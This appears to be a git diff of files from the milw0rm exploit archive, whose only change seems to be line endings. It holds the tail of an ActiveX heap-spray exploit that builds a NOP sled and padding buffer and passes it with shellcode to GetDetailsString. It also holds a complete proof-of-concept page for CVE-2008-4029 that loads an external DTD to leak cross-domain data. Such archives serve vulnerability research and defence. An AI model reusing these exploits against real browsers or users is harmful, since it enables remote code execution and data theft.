-var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
+var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
-
+
-for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
+for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
-
+
-buff = buff + nsp + sh + nop + shellcode;
+buff = buff + nsp + sh + nop + shellcode;
-
+
-target.GetDetailsString(buff,1);
+target.GetDetailsString(buff,1);
-}
+}
-
+
-</script>
+</script>
-</pre>
+</pre>
-</html>
+</html>
-
+
-# milw0rm.com [2008-09-13]
+# milw0rm.com [2008-09-13]
--- a/platforms/windows/remote/7196.html
+++ b/platforms/windows/remote/7196.html
@ -1,17 +1,17 @@
-<html>
+<html>
-<body>
+<body>
-KB955218 - CVE-2008-4029 - JA
+KB955218 - CVE-2008-4029 - JA
-<script type="text/javascript">
+<script type="text/javascript">
-var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
+var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
-dom.async = false;
+dom.async = false;
-var url = "http://www.milw0rm.com/forfun.dtd";
+var url = "http://www.milw0rm.com/forfun.dtd";
-var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
+var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
-if (dom.loadXML(xml) == 0)
+if (dom.loadXML(xml) == 0)
-{
+{
-	alert("Blue or Red Pill? " + dom.parseError.srcText);
+	alert("Blue or Red Pill? " + dom.parseError.srcText);
-}
+}
-</script>
+</script>
-</body>
+</body>
-</html>
+</html>
-
+
-# milw0rm.com [2008-11-23]
+# milw0rm.com [2008-11-23]